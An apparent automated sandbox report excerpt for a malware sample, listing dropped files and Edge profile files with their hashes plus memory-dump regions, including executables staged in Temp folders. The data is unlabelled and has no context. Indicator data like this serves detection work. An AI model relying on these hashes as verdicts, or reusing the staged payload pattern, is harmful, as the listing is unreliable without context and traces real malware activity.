| SHA256 | 7dd0d536254eb64d723254638e87b723ee947a2478ac54e5d513c66b53c358df |
| SHA512 | 92bb42f19230939bab4126ff45e4c0fa939996c6567b8704ec7e27f918d19007c0a0150ef75a6f72027f7c4043b8c55582eb62f5960372553c773cc151dc8cb7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1e69e5456a4f29cbd926537e2a17c838 |
| SHA1 | e9a2267760353213fe88e10eee8fb4ad9d188363 |
| SHA256 | 7dd0d536254eb64d723254638e87b723ee947a2478ac54e5d513c66b53c358df |
| SHA512 | 92bb42f19230939bab4126ff45e4c0fa939996c6567b8704ec7e27f918d19007c0a0150ef75a6f72027f7c4043b8c55582eb62f5960372553c773cc151dc8cb7 |
\??\pipe\LOCAL\crashpad_4828_EKRLGZOSLBATQUHR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\pipe\LOCAL\crashpad_768_KSFLHYPHDXRKREXX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\pipe\LOCAL\crashpad_1580_WTSACVZXEFNONFHB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | af4d69ab0e30187a0d5d7838d494dff8 |
| SHA1 | 803551a7085c8a838c576ba7dad45b88c816c7b6 |
| SHA256 | 244b9fc2b66f7d6a1f2b8265ab569f67cadf792e8371cecb78b1632d4655868c |
| SHA512 | 83a7f15aa7c3db9d398ead7c5e7ecc069c440109dce8f23694145da53cd1b25e81dd7869692c3f140a74aa2686a364917b72e06f384316f01f71ebe16200d2d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5b102b635552ec427eb990de4e60809d |
| SHA1 | 3410f20ba4fa3c7ac24e260bea7355bfc6a97490 |
| SHA256 | 903da9b1f8c40c66938ee6e7d8436d044927065e8963a7af85a839ed3495d2c2 |
| SHA512 | d47b8cc7ecdc91c5be950ae284e050a8f10d7d435b7e40017e44d144f1aa245be9df748ca68b0d9bdc8b79842d7db5ce7c82aa2047ed9b80bc0665dc832ef761 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1e69e5456a4f29cbd926537e2a17c838 |
| SHA1 | e9a2267760353213fe88e10eee8fb4ad9d188363 |
| SHA256 | 7dd0d536254eb64d723254638e87b723ee947a2478ac54e5d513c66b53c358df |
| SHA512 | 92bb42f19230939bab4126ff45e4c0fa939996c6567b8704ec7e27f918d19007c0a0150ef75a6f72027f7c4043b8c55582eb62f5960372553c773cc151dc8cb7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 483924abaaa7ce1345acd8547cfe77f4 |
| SHA1 | 4190d880b95d9506385087d6c2f5434f0e9f63e8 |
| SHA256 | 9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684 |
| SHA512 | e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310 |
memory/4172-314-0x0000000074320000-0x0000000074AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002d
| MD5 | a5c3c60ee66c5eee4d68fdcd1e70a0f8 |
| SHA1 | 679c2d0f388fcf61ecc2a0d735ef304b21e428d2 |
| SHA256 | a77e911505d857000f49f47d29f28399475324bbf89c5c77066e9f9aca4dd234 |
| SHA512 | 5a4f5a1e0de5e650ca4b56bfd8e6830b98272a74d75610ed6e2f828f47cdf8447fbc5d8404bcf706ca95e5833e7c255f251137855723b531d12cbc450062750a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 59f9d6873008533f713e17aa25a45639 |
| SHA1 | b1524fc1509d784901225d5bf9b04af0da6f0adf |
| SHA256 | 193b5c6c351ad4e5ac8e91e91b1d2db50e9a3e9f90237533762ce1acd35cdacb |
| SHA512 | 3e27ee91e3bb94f29581c7f683fad27119633c9e059f4a6906be69d1bc1f401457ff4508ddd12e4c8b3234621d0ab1706d854c958d6ccc6a192f3fbc343cd713 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 923a543cc619ea568f91b723d9fb1ef0 |
| SHA1 | 6f4ade25559645c741d7327c6e16521e43d7e1f9 |
| SHA256 | bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd |
| SHA512 | a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 7d75a9eb3b38b5dd04b8a7ce4f1b87cc |
| SHA1 | 68f598c84936c9720c5ffd6685294f5c94000dff |
| SHA256 | 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7 |
| SHA512 | cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | a6056708f2b40fe06e76df601fdc666a |
| SHA1 | 542f2a7be8288e26f08f55216e0c32108486c04c |
| SHA256 | fe8009d99826585803f561c9d7b01c95ec4a666e92fedb2c1ca6fa0f50bb7152 |
| SHA512 | e83e64d00199a51c1f17faca3012f6f28ad54e5ac48acea6509cccdd61ddb08b03c3a895776944190a4e261393b90f9f516ad64b1b0e4cdd88a66f6f691331a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c952a14d48aa778ab66ae9780c91bbc3 |
| SHA1 | 298433562f74271b1b6aa02cafe28a8c4d178d33 |
| SHA256 | e84460e6f1dfd33745aae60312b2a6c7e097159f9b213d09b5b9dbbf2b6a9506 |
| SHA512 | 0b2c91d173bdb1290207734265ae6ace4e47fe34a5a8536d128e10d53380fa8a86a5bf5e4299ded06975771dd8dba6e286a92f1c35016ae737ea9814690e3b9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a
| MD5 | b24045e033655badfcc5b3292df544fb |
| SHA1 | 7869c0742b4d5cd8f1341bb061ac6c8c8cf8544b |
| SHA256 | ce60e71ab0f5a6f0a61ee048ff379b355d72cd01fda773380b4b474b4273ec6c |
| SHA512 | 0496eab064778fe47802d7f79a536022de4a89d085457ad0d092597f93e19653f750b86f5649768e18f631505ff9792c421ba3a14b9d30522d731b5cd3d8206c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 1c706d53e85fb5321a8396d197051531 |
| SHA1 | 0d92aa8524fb1d47e7ee5d614e58a398c06141a4 |
| SHA256 | 80c44553381f37e930f1c82a1dc2e77acd7b955ec0dc99d090d5bd6b32c3c932 |
| SHA512 | d43867392c553d4afffa45a1b87a74e819964011fb1226ee54e23a98fc63ca80e266730cec6796a2afa435b1ea28aed72c55eae1ae5d31ec778f53be3e2162fc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003d
| MD5 | 990324ce59f0281c7b36fb9889e8887f |
| SHA1 | 35abc926cbea649385d104b1fd2963055454bf27 |
| SHA256 | 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc |
| SHA512 | 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Cy92xA.exe
| MD5 | df0bd13edfdcbd83f1a89516afa0e803 |
| SHA1 | d2eba6a498ee95674fa437c94da6356897a59a68 |
| SHA256 | 467c6c2a1c6495d6b81eab0113ee0d088966183f29c3f27b61ed2edf06b31c24 |
| SHA512 | e6a31e609633932ac172a31a639d5ca2ca47fa0664c2e276aad97363bd71d782e4e676c4ddf4d1b5de9661e2244bf5edf1a8f3650e1edd2086dd89801ac94938 |
C:\Users\Admin\AppData\Local\Temp\F926.exe
| MD5 | e561df80d8920ae9b152ddddefd13c7c |
| SHA1 | 0d020453f62d2188f7a0e55442af5d75e16e7caf |
| SHA256 | 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea |
| SHA512 | a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4rX028OL.exe
| MD5 | a7ec035736ed03c89879b47b99e048d9 |
| SHA1 | 1eb9f938f84eb95351dccbfcb065eda506458e71 |
| SHA256 | e142f2f54b96551f64ba2cbc996b366333e4a2a2e633c213536b5d9171a8e503 |
| SHA512 | 83a903822cd54856052d72c3caec2e16f785af000963cbbf9cc28e590aaeeda04f33aa11afe6330e31e37380875b88dbd9107280994e8f143df12d0e4300708a |
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1cJ14rw7.exe
| MD5 | 5c0f230733975ca9addb7fb932ba7fd8 |
| SHA1 | 70332e6d8e29f8b334079fc914c6fc134453547e |
| SHA256 | 6aaadefd6b657971a15bd5a6afa20a0bc883b13d89c5109ccdd58f9bd3a14aa7 |
| SHA512 | 5234959d6344c7a0026f33a7ae54c01ee085f7a4c96f1a0c29821c8d1c873d35371cc37c4d17ba99e5dcba059c3e4e7ca92782c580a0d28ffc4ed6a70b9175c0 |
memory/5132-640-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/5132-642-0x0000000007020000-0x0000000007030000-memory.dmp
memory/6976-644-0x0000000000BB0000-0x0000000000BBA000-memory.dmp
memory/6976-645-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/6252-652-0x0000000000400000-0x0000000000434000-memory.dmp
memory/6252-653-0x0000000000400000-0x0000000000434000-memory.dmp
memory/6252-655-0x0000000000400000-0x0000000000434000-memory.dmp
memory/6552-660-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/6552-659-0x0000000000CD0000-0x0000000000D0E000-memory.dmp
memory/6552-663-0x0000000007C50000-0x0000000007C60000-memory.dmp
memory/6320-674-0x0000000000400000-0x0000000000480000-memory.dmp
memory/6320-676-0x0000000000550000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1d0e573b239394772816eb2d839ac516 |
| SHA1 | d7562e74e9cb74fbd88b85682a753249de96596d |
| SHA256 | a8394c21101e2c1c97ba445c8493f5513bf92c62c1abc957074e38ab34e94086 |
| SHA512 | d0b35009ad8ddbae796905c3512a950544df8bd6950c1a6b11c2d7b41482aad15ea3de9fae60a931e6f885ee920ea056ecd3d3cc7894590ae0042fdfca51b6a2 |
memory/6320-702-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/6320-724-0x0000000007630000-0x0000000007640000-memory.dmp
memory/5132-734-0x0000000074320000-0x0000000074AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d
| MD5 | 9ee8d611a9369b4a54ca085c0439120c |
| SHA1 | 74ac1126b6d7927ec555c5b4dc624f57d17df7bb |
| SHA256 | e4cf7a17182adf614419d07a906cacf03b413bc51a98aacbcfc8b8da47f8581c |
| SHA512 | 926c00967129494292e3bf9f35dbcdef8efdbddc66114d7104fcc61aa6866298ad0182c0cbdf923b694f25bb9e18020e674fd1367df236a2c6506b859641c041 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000048
| MD5 | 2d64caa5ecbf5e42cbb766ca4d85e90e |
| SHA1 | 147420abceb4a7fd7e486dddcfe68cda7ebb3a18 |
| SHA256 | 045b433f94502cfa873a39e72d616c73ec1b4c567b7ee0f847f442651683791f |
| SHA512 | c96556ec57dac504919e806c7df536c4f86892b8525739289b2f2dbbf475de883a4824069dbdd4bb1770dd484f321563a00892e6c79d48818a4b95406bf1af96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000047
| MD5 | 57613e143ff3dae10f282e84a066de28 |
| SHA1 | 88756cc8c6db645b5f20aa17b14feefb4411c25f |
| SHA256 | 19b8db163bcc51732457efa40911b4a422f297ff3cd566467d87eab93cef0c14 |
| SHA512 | 94f045e71b9276944609ca69fc4b8704e4447f9b0fc2b80789cc012235895c50ef9ecb781a3ed901a0c989bed26caa37d4d4a9baffcce2cb19606dbb16a17176 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000046
| MD5 | ce6bda6643b662a41b9fb570bdf72f83 |
| SHA1 | 87bcf1d2820b476aaeaea91dc7f6dbedd73c1cb8 |
| SHA256 | 0adf4d5edbc82d28879fdfaaf7274ba05162ff8cbbda816d69ed52f1dae547f6 |
| SHA512 | 8023da9f9619d34d4e5f7c819a96356485f73fddcb8adb452f3ceefa8c969c16ca78a8c8d02d8e7a213eb9c5bbe5c50745ba7602e0ee2fe36d2742fb3e979c86 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049
| MD5 | 4f7c668ae0988bf759b831769bfd0335 |
| SHA1 | 280a11e29d10bb78d6a5b4a1f512bf3c05836e34 |
| SHA256 | 32d4c8dc451e11db315d047306feea0376fbdc3a77c0ab8f5a8ab154164734d1 |
| SHA512 | af959fe2a7d5f186bd79a6b1d02c69f058ecd52e60ebd0effa7f23b665a41500732ffa50a6e468a5253bb58644251586ae38ec53e21eab9140f1cf5fd291f6a5 |
memory/6320-787-0x0000000008150000-0x00000000081B6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003b
| MD5 | 48b805d8fa321668db4ce8dfd96db5b9 |
| SHA1 | e0ded2606559c8100ef544c1f1c704e878a29b92 |
| SHA256 | 9a75f8cc40bbe9c9499e7b2d3bab98a447685a361489357a111479517005c954 |
| SHA512 | 95da761ca3f99f7808a0148cfa2416b8c03d90859bff65b396061ada5a4394fb50e2a4b82986caab07bc1fcd73980fe9b08e804b3ce897762a17d2e44935076d |
memory/5132-820-0x0000000007020000-0x0000000007030000-memory.dmp
memory/6976-864-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/6320-906-0x0000000009770000-0x00000000097C0000-memory.dmp
memory/6320-907-0x00000000097C0000-0x0000000009836000-memory.dmp
memory/6976-934-0x0000000074320000-0x0000000074AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8601192c9ca6b8aa02c3560ee8d29260 |
| SHA1 | a0561dd2deb0b52c434fd8968ae6fff8c5dd4e6c |
| SHA256 | 4ceb159907bb3828003c64a6c96116ccb05a164b67110cf2b50cb9f958d7ab44 |
| SHA512 | 3d09846afbe76b82a69d4fe7697da2a618285af9338ba0f26c75bd2b78f1dbb7827eaad693e5ee3320e1fb30874cfc38978cae6e87307710ac31dca6b92205af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582882.TMP
| MD5 | cbfc646a931e689edfc625500e2e0492 |
| SHA1 | f31a101a614f0ccbdbe6b20afaaa5208f5fd0d2d |
| SHA256 | b8ca9d51d8aabab035057c8663855dcdc9785c1cc65f47888cdf55bd4cc586fb |
| SHA512 | 7779605bdd7177e195a57491cadd284fc62cfb7e3ce9aa51c6415805a161ab854a6a24b387b08f120271007a65cfa1f87601f18386c9e5c2e0c8c34b1bf0dc56 |
memory/6552-981-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/7480-987-0x0000000000690000-0x0000000001074000-memory.dmp
memory/6552-986-0x0000000007C50000-0x0000000007C60000-memory.dmp
memory/7480-988-0x0000000074320000-0x0000000074AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 6e68805f0661dbeb776db896761d469f |
| SHA1 | 95e550b2f54e9167ae02f67e963703c593833845 |
| SHA256 | 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47 |
| SHA512 | 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc |
memory/6320-996-0x0000000009970000-0x0000000009B32000-memory.dmp
memory/6320-999-0x0000000009B40000-0x000000000A06C000-memory.dmp
memory/6320-1004-0x0000000000400000-0x0000000000480000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 89c82822be2e2bf37b5d80d575ef2ec8 |
| SHA1 | 9fe2fad2faff04ad5e8d035b98676dedd5817eca |
| SHA256 | 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9 |
| SHA512 | 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101 |
memory/6320-1007-0x000000000A340000-0x000000000A35E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kos4.exe
| MD5 | 01707599b37b1216e43e84ae1f0d8c03 |
| SHA1 | 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2 |
| SHA256 | cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd |
| SHA512 | 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642 |
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/7220-1026-0x00000000002E0000-0x00000000002E8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f1b766b451585f422141ae9d4ca58876 |
| SHA1 | 50051cc62e01ffba580e73b0a1a3338f9af3576f |
| SHA256 | 7a46c33c6bfc46a8b8e23d3ba2906307b7dde20e287f6911f51df6335deb1df9 |
| SHA512 | c4fdd53741060c453d793a8fc982d63f656c5e2ea0c656d0e499bf37d402eb879e6d8ec937232962a96eaa4186d7ef190fc9b45880e5fbe9b8224c73d231ca18 |
memory/6320-1031-0x0000000074320000-0x0000000074AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
memory/7220-1053-0x00007FFC99AE0000-0x00007FFC9A5A1000-memory.dmp
memory/6320-1055-0x0000000007630000-0x0000000007640000-memory.dmp
memory/7480-1054-0x0000000074320000-0x0000000074AD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ce389db6262e500cb983acad6e33343d |
| SHA1 | 6e5a42b82263e0600834a1ebe37ac49286cdd9dc |
| SHA256 | 6cf93516be13ff01dc2aa691f7d32e4d1aa1db7bf69a0960c3c69c3716ff4863 |
| SHA512 | fff5e238c2d5fe0d77164f5c4b1eca284d35ff46dc4e4d28afb591bbc5e55ddf36347e27633269a83484c1c0f50784b8113a14a8f78e42d1de0d6127eebf2918 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 1a3f13fac6b639aa38952ff49ea57798 |
| SHA1 | 0f69ead74745f26cca6f8e09d1b6773445bb90d8 |
| SHA256 | 68cbd0daba8eebe22851ab53a81cbec050dee65d169dac72e63b6a5da4c47c68 |
| SHA512 | 426709ca4a8372d1e3fea70fea1069c04734e738d0e9c764d65d921353424b4a9680a21df71986ef1f896503815d083f003b3cc1beb301b6bfc78819d3bd1c12 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 57db2915b37c389b008fe05c61bf8a0b |
| SHA1 | 7a96f5f789a5ef9b518b9475931ea4658e67fbb4 |
| SHA256 | 2fc648028779ad72ed3c557eaaacd0da519d4915898b9f1450b98ff94e2b2761 |
| SHA512 | 64dcb1adbe0f10da29fb5fc2db5bfecb60deb8debf54b2a19249855f9909999c5e2318678e211a0be1698765cd2d2bea10841ee2ebe1ad89f3d27aff027f9fc3 |
memory/3968-1082-0x0000000000A90000-0x0000000000E70000-memory.dmp
memory/3968-1083-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/3968-1084-0x00000000056A0000-0x000000000573C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
| MD5 | 7e9a2a52576c56760174d96326844bf6 |
| SHA1 | a1a7e537901f00f8e5eb1757043032d533398d8a |
| SHA256 | e04c9a1f1b4610ecb894769f13f50f2c62049dd8e90d7b3f3bc6a28d3d21bd4a |
| SHA512 | 9b3da96429fb67a28b3c3f9924e485c4fd2acb2bcbfcd45efbb19f4987ce8950874514c055e46e0d440d8316d401f626dc774c70b0e04e56d98e46dd6ce62a64 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 4eb84b1696f68db1c2803854add96fc3 |
| SHA1 | d9925a70754e5169187e4dc144da0c7b2a6fc7ec |
| SHA256 | caff575a273c7ea112fa9c6a5087e6e9d730262110942c5fda16c08ceb9f3c78 |
| SHA512 | 719adbeade0f2279279fa068a28bb5e089f4b6da5900b131e507b753134318d14498d2956352568c4d4dd1c1d406c0ede781d303185ec48e66d490d76ff8f427 |
memory/8068-1134-0x0000000000400000-0x0000000000418000-memory.dmp
memory/7220-1136-0x00007FFC99AE0000-0x00007FFC9A5A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027
| MD5 | 9f1c899a371951195b4dedabf8fc4588 |
| SHA1 | 7abeeee04287a2633f5d2fa32d09c4c12e76051b |
| SHA256 | ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7 |
| SHA512 | 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54 |
memory/7728-1148-0x0000000000540000-0x000000000057E000-memory.dmp
memory/7872-1173-0x0000000000610000-0x0000000000611000-memory.dmp
memory/7728-1147-0x0000000000400000-0x0000000000461000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000037
| MD5 | bceb0378c3089b39ab86bdea6cd0ca3b |
| SHA1 | f0eff49f445b4186e8f3c45e0111d91655f00e6b |
| SHA256 | 70ec4829127eb434e7391065ebe48b74ea072cfa4a27b7267369422a0de459d7 |
| SHA512 | 64e8be49fac5a4857769e4ec0fac28f31d10075b58c86039bb6b6d2e9b4ddd1c4c7a3385717e450d8c19ceef3ce323b6c5ed1f4f6cdbb61ace01a61f102f76a9 |
memory/7728-1226-0x0000000074320000-0x0000000074AD0000-memory.dmp
memory/4656-1231-0x0000000000400000-0x0000000000409000-memory.dmp
memory/8196-1232-0x0000000000400000-0x0000000000611000-memory.dmp
memory/8196-1233-0x0000000000400000-0x0000000000611000-memory.dmp
memory/6800-1247-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/1312-1248-0x0000000002990000-0x0000000002D98000-memory.dmp
